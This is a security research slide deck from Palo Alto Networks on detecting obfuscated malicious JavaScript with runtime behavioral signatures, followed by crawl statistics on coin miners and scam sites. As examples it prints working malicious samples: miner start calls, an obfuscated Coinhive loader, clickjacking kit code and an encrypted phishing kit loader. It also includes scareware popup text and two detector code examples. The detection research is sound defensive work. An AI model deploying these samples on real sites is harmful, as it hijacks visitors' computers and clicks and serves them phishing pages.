Detecting malicious campaigns in
obfuscated JavaScript with scalable
behavioral analysis
Oleksii Starov, Yuchen Zhou, Jun Wang
Palo Alto Networks, Inc.
Malicious JavaScript Detection in Previous Research & Industry
Approaches: Static Analysis vs. Dynamic Analysis; Signature Matching vs. ML/DL Models
2 | WTMC 2019
• We propose “behavioral” runtime signatures:
  ✓ Based on lightweight in-browser execution, and thus effectively scalable
  ✓ Capable of detecting variations of packed/obfuscated malware
  ✓ Capable of detecting modern malicious campaigns
Studied Types of Behavioral Signatures
• Runtime Code Representation: global variables
• Non-HTTP Traffic: WebSocket connections and messages
• Rendered Visible Text: JavaScript alerts and popups
Example: In-browser Cryptographic Coin Miners
<script>
var miner = new CoinHive.User('SITE_KEY', 'john-doe');
miner.start();
var miner = new CRLT.Anonymous('PUBLIC_KEY', {threads:2});
miner.start();
…
</script>
Coin-mining libraries (23): Adless, BatMine, CoinBlind, CoinHave, CoinImp, CoinNebula, Coinhive, Crypto-Loot, CryptoNoter, DeepMiner, Grindcash, JSE-Coin, JsMiner, Mineralt, Minr, Monerise, NFWebMiner, NeroHut, Papoto, ProjectPoi, WebXMR, Webmine, Webminerpool
Global Variable Signatures: Detecting Obfuscated Miners
(function(){
var _0xdf51=["\x70\x61\x72\x61\x6D\x73","\x5F\x73\x69\x74\x65\x4B\x65\x79",
"\x5F\x75\x73\x65\x72","\x5F\x74\x68\x72\x65\x61\x64\x73","\x5F\x68\x61\x73\x68\x65\x73",
"\x5F\x63\x75\x72\x72\x65\x6E\x74\x4A\x6F\x62","\x5F\x61\x75\x74\x6F\x52\x65\x63\x6F\x6E\x6E\x65\x63\x74",
...
MINER_URL:_0xdf51[207],AUTH_URL:_0xdf51[208]};CoinHive[_0xdf51[104]]=
CoinHive.Res(_0xdf51[209]);var user=window[_0xdf51[211]][_0xdf51[210]]||
_0xdf51[212],miner= new
CoinHive.User(_0xdf51[213],user,{throttle:0.3});miner[_0xdf51[89]]()||
miner[_0xdf51[53]]()
})();
Still “CoinHive” and “miner” variables (with clear semantics) during runtime!
Example: Clickjacking Kit
jQuery(document).ready(function() {
    $("#clickjack-button-wrapper-5")
        .parent().mousemove(function(e) {
            jQuery("#clickjack-button-wrapper-5").css({
                top: e.pageY - 10,
                left: e.pageX + 30
            });
        });
    clickjack_hider();
    var clickjack_fb_timer =
        setTimeout("clickjack_hider()", 5000);
});
function clickjack_hider() {
    jQuery("input").mouseout(function() {
        ClickJackFbShow();
    });
    jQuery("a").mouseout(function() {
        ClickJackFbShow();
    });
    jQuery("button").mouseout(function() {
        ClickJackFbShow();
    });
    jQuery("textarea").mouseout(function() {
        ClickJackFbShow();
    });
    jQuery(".ratingblock").mouseout(function() {
        ClickJackFbShow();
    });
    jQuery("object").mouseout(function() {
        ClickJackFbShow();
    });
    jQuery("input").mouseover(function() {
        ClickJackFbHide();
    });
    jQuery("a").mouseover(function() {
        ClickJackFbHide();
    });
    jQuery("button").mouseover(function() {
        ClickJackFbHide();
    });
    jQuery("textarea").mouseover(function() {
        ClickJackFbHide();
    });
    jQuery(".ratingblock").mouseover(function() {
        ClickJackFbHide();
    });
    jQuery("object").mouseover(function() {
        ClickJackFbHide();
    });
}
…
✓ clickjack_hider
✓ ClickJackFbShow
✓ ClickJackFbHide
Example: Phishing Kit
var hea2p =
('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz');
var hea2t =
'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
GxOB6PGs=';
var output = Aes.Ctr.decrypt(hea2t, hea2p, 256);
document.write(output)
Websocket Signatures: Detecting Unauthorized Miners
Stratum Protocol Messages
Request:
{
  "type": "submit",
  "params": {
    "version": 7,
    "job_id": "871932594873942",
    "nonce": "8a462f80",
    "result": "7516e7...de4df27f300"
  }
}
Response:
{
  "type": "hash_accepted",
  "params": {
    "hashes": 256
  }
}
Obfuscated CoinImp Messages
Request:
suu9sLms6/PruryrpKC96+Xruai7qKS66/Oy66e
mp6qs6/Prqvqqr//+//jr5eu7rLq8pb3r8+us//
itqP2v8f//+6+tqKj5q/n7qPz48PuvqP//qK/++
Pz8+PD9+6z8+6r8/qqv8f6o/qiv8fzx/f//+v77
+fn56+Xro6arlqCt6/Pr+v/5+v/x/vD4+P7/+fn
/67S0
Response:
suu9sLms6/Pp66Omq+vl6eu5qLuopLrr8+my66u
lpqvr8+nr+fD58Kr68Pzw/6z5+fzx8Pr4/KusqP
H6+Kr4rKj6+aiqq63xqPiorPv8qPqo8P77qP///
K36qv7x/auqr/DxqPv68PD9+aut+a+s8fGv+fn5
+fn5+fn9qq2s/fuqr/2orf+r8az4//+sraiqqv7
88Putq/D7/vn/qqz8+quorfz7qPGo+fHxr/Go/P
v4raj7/Kiv8az/+fvr5enro6arlqCt6/Pp6/r/+
fr/8f7w+Pj+//n5/+vl6eu9qLuurL3r8+nr+a3+
/a2o+fnr5enrvqCt6/Pp+Pu0tA==
(still detected, despite the several layers of obfuscation)
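Added example, not code from the slides, of the WebSocket-message signatures described above: recorded text frames are classified as Stratum share submissions and pool acknowledgements (the slide 8 pair), and a session summary counts accepted hashes as the evidence of successful mining. The frames are constructed; the rule for obfuscated CoinImp frames keys on the constant prefix visible on the slide and is an assumption, since the encoding itself is not described.

```javascript
// Added example (not from the slides): WebSocket-message signatures for
// Stratum mining traffic, as recorded by a crawler that logs every frame.

// Assumed constant prefix of the obfuscated CoinImp frames shown on slide 8.
const COINIMP_OBFUSCATED_PREFIX = 'suu9sLms6/P';

// Classify one WebSocket text frame. Returns null for anything not matching.
function classifyFrame(raw) {
  let msg = null;
  try { msg = JSON.parse(raw); } catch (e) { /* not JSON: fall through */ }
  if (msg && typeof msg === 'object' && typeof msg.type === 'string' &&
      msg.params && typeof msg.params === 'object') {
    const p = msg.params;
    // Share submission: job id plus a hex nonce and a hash result.
    if (msg.type === 'submit' && typeof p.job_id === 'string' &&
        /^[0-9a-f]+$/i.test(String(p.nonce)) && typeof p.result === 'string') {
      return { family: 'stratum-json', kind: 'submit', hashes: 0 };
    }
    // Pool acknowledgement: the share was accepted, i.e. mining succeeded.
    if (msg.type === 'hash_accepted' && Number.isInteger(p.hashes) && p.hashes > 0) {
      return { family: 'stratum-json', kind: 'hash_accepted', hashes: p.hashes };
    }
    return null;
  }
  if (typeof raw === 'string' && raw.startsWith(COINIMP_OBFUSCATED_PREFIX)) {
    return { family: 'coinimp-obfuscated', kind: 'opaque', hashes: 0 };
  }
  return null;
}

// Summarize a recorded WebSocket session: which signature families fired,
// how many shares were submitted and how many hashes the pool accepted.
// Accepted hashes are the evidence of *successful* mining; whether the site
// had the user's consent cannot be read from the traffic alone.
function summarizeSession(frames) {
  const hits = frames.map((f) => classifyFrame(f.data)).filter(Boolean);
  const acceptedHashes = hits.reduce((n, h) => n + h.hashes, 0);
  return {
    families: [...new Set(hits.map((h) => h.family))],
    submits: hits.filter((h) => h.kind === 'submit').length,
    acceptedHashes,
    successfulMining: acceptedHashes > 0,
  };
}

// Constructed session: one Stratum exchange modelled on slide 8, one
// obfuscated CoinImp frame (first line from the slide), and one unrelated
// chat message that must not match.
const SAMPLE_SESSION = [
  { dir: 'out', data: JSON.stringify({ type: 'submit', params: {
      version: 7, job_id: '871932594873942', nonce: '8a462f80', result: '7516e7...de4df27f300' } }) },
  { dir: 'in', data: JSON.stringify({ type: 'hash_accepted', params: { hashes: 256 } }) },
  { dir: 'out', data: 'suu9sLms6/PruryrpKC96+Xruai7qKS66/Oy66e' },
  { dir: 'in', data: JSON.stringify({ type: 'chat', params: { text: 'hello' } }) },
];
```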
JavaScript Popups and Alerts (and related API calls)
• “WARNING! Your official Adobe Flash Player version is out of date. Please install latest software update to continue. Please click "Update" to continue.”
• "IMMEDIATELY CALL APPLE CARE"
• "Congratulations Amazon user!"
• "Microsoft Excel, Click "OK" below to view your file online instead"
Intercepted APIs: window.alert, window.prompt, window.confirm, window.onbeforeunload
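Added example, not code from the slides, of intercepting the four APIs listed above: the hooks are installed on the window object before any page script runs, auto-dismiss each dialog so the crawl never blocks, trap assignment to onbeforeunload so its text can be captured when the crawler leaves the page, and match the captured text against the scareware phrases quoted on this slide. The fake window, the page script and the signature names are constructed stand-ins.

```javascript
// Added example (not from the slides): hooking window.alert/prompt/confirm
// and window.onbeforeunload ahead of page scripts, then matching the text.

// Phrases quoted on slide 9; the signature names are assumptions.
const POPUP_SIGNATURES = [
  { name: 'fake-flash-update',    re: /adobe\s+flash\s+player.*out\s+of\s+date/i },
  { name: 'tech-support-scam',    re: /immediately\s+call\s+apple\s*care/i },
  { name: 'prize-scam',           re: /congratulations\s+amazon\s+user/i },
  { name: 'fake-document-viewer', re: /microsoft\s+excel.*click\s+"?ok"?/i },
];

// Replace alert/prompt/confirm with recorders that auto-dismiss (so the crawl
// never blocks) and trap assignment to onbeforeunload, whose text is only
// produced when the page is left.
function installPopupHooks(win, log) {
  const autoReply = { alert: undefined, prompt: '', confirm: true };
  for (const api of Object.keys(autoReply)) {
    win[api] = function (message) {
      log.push({ api, text: String(message) });
      return autoReply[api];
    };
  }
  let handler = null;
  Object.defineProperty(win, 'onbeforeunload', {
    configurable: true,
    get() { return handler; },
    set(fn) { handler = fn; },
  });
  // Called by the crawler when it navigates away: run the handler with a fake
  // event and record whatever text it tries to show (return value or
  // event.returnValue, the two ways a page can supply the message).
  win.__fireBeforeUnload = function () {
    if (typeof handler !== 'function') return;
    const event = { returnValue: undefined };
    const ret = handler.call(win, event);
    const text = ret !== undefined ? ret : event.returnValue;
    if (text !== undefined) log.push({ api: 'onbeforeunload', text: String(text) });
  };
  return win;
}

// Match every captured message against every signature.
function matchPopups(log) {
  const hits = [];
  for (const entry of log) {
    for (const sig of POPUP_SIGNATURES) {
      if (sig.re.test(entry.text)) hits.push({ api: entry.api, signature: sig.name });
    }
  }
  return hits;
}

// Constructed page script using the phrases quoted on slide 9.
const SCAM_PAGE_SCRIPT = `
  window.alert("WARNING! Your official Adobe Flash Player version is out of date. " +
               "Please install latest software update to continue.");
  window.confirm('Microsoft Excel, Click "OK" below to view your file online instead');
  window.onbeforeunload = function () { return "IMMEDIATELY CALL APPLE CARE"; };
`;

// Install hooks on a fresh fake window, run the page, simulate leaving it.
function scanPopups(pageScript) {
  const log = [];
  const win = installPopupHooks({}, log);
  new Function('window', pageScript)(win);   // hooks are in place before the page runs
  win.__fireBeforeUnload();                  // simulate navigating away
  return { log, hits: matchPopups(log) };
}
```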
Data Collection & Results
Production Pipeline & Data Collection
We measure how behavioral signatures can improve a state-of-the-art commercial URL categorization service
• Crawling data
  • Daily feed of "unknown" URLs visited by Palo Alto Networks customers (i.e. more than 10M URLs per day)
  • Reporting results for November 2018
• Crawling infrastructure
  • Existing security scanner based on Headless Chrome Browser
  • Extended to collect global variables, intercept JavaScript alerts, and record WebSocket handshakes/messages
• 250 unique signatures for detection
  • Collected semi-automatically by retrieving dynamic artifacts from VirusTotal URLs
  • Attributing 23 coin-mining libraries
RESULT HIGHLIGHTS
Overall detection results
• 9,104 coin-mining scripts over 8,712 distinct URLs
• 4,788 other malicious JavaScripts over 4,633 distinct URLs
Real user impact (if blocked)
• Over 1M requests towards coin-mining websites
• Over 243K towards scams/scareware/phishing pages
Intrusive Coin Miners
Daily Detection Rate of Coin-mining URLs
• 1,097 coin-mining URLs on average per day
• Only 180 previously unseen URLs daily!
• 69.1% of detected URLs perform “unauthorized” successful coin mining
• 1,414 out of 4,264 Coinhive scripts were obfuscated and undetected by static matching
Top Coin Miners Observed during Study
Unauthorized mining:
• CoinImp (100% / 612 JS)
• Crypto-Loot (86% / 906 JS)
• Coinhive (77.7% / 3,312 JS)
• Unidentified Stratum
Malicious Operators Rotate or Even Use Several Miners
9,104 scripts detected over 8,712 URLs!
Non-mining Malicious JavaScript
Daily Detection Rate of Coin-mining URLs
• 184 malicious URLs per day, including 143 URLs unseen previously
• URLs hosting non-mining JS malware are less likely to be observed for many days in a row!
Top Recently Observed Non-Mining Malicious JavaScripts
Our signatures capture many scam-related scripts!
Analysis of Malicious Domains
Using Passive DNS to Measure Popularity & Lifetime
• 8,712 detected coin-mining URLs resolve to 7,654 distinct domains
• 4,633 URLs with other malicious scripts resolve to 2,666 domains
• Two visual clusters:
  • Coin-mining domains receive tens of millions of DNS resolutions and can live for more than 4 years
  • Non-mining malicious domains are usually alive for less than 100 days and receive less than 10K DNS resolutions
Example pair: seriesfree.to vs. win32-0x2ndt-firewall-error.gq
Popularity Analysis Using Alexa rankings
• 66.9% of coin-mining domains were observed in Alexa’s top 1M
  • 16.9% remained in the top 1M during the whole month
  • 37 domains in the first 10K
  • 932 mining immediately
• In contrast, only 71 from non-mining malicious JavaScript domains were found in Alexa’s top 1M
Analysis of TLDs among Detected Malicious Websites
Coin-mining websites          Non-mining websites
TLD    # Domains              TLD    # Domains
com    3,487                  icu    1,299
ir     394                    com    409
net    337                    club   290
ru     319                    xyz    83
org    285                    tk     71
• In November 2018, the .icu TLD was abused the most to distribute different kinds of scam
• Coin-miners tend to reside on generally more expensive (and reputable) .com, which matches our previous findings
Country origin of IPs serving malicious JavaScript
[Map: coin miners vs. other malicious JS]
Coin-mining websites cover more countries!
CONCLUSION & FUTURE WORK
• We presented several examples of lightweight dynamic techniques to detect obfuscated malicious JavaScript using behavioral signatures
  • On a large scale and detecting modern malicious campaigns
• Extending and generalizing the method:
  • More “runtime-code-representation” signatures (such as types and values of variables, local variables, custom implementations of alerts, eval code, etc.)
  • Automated retrieval of behavioral signatures (using clustering and benign scores)
  • Using behavioral signatures as features for ML detection models
  • Using behavioral signatures for attribution of malicious campaigns
THANK YOU!
Q&A?
Email: ostarov@paloaltonetworks.com | Twitter: @o_starov
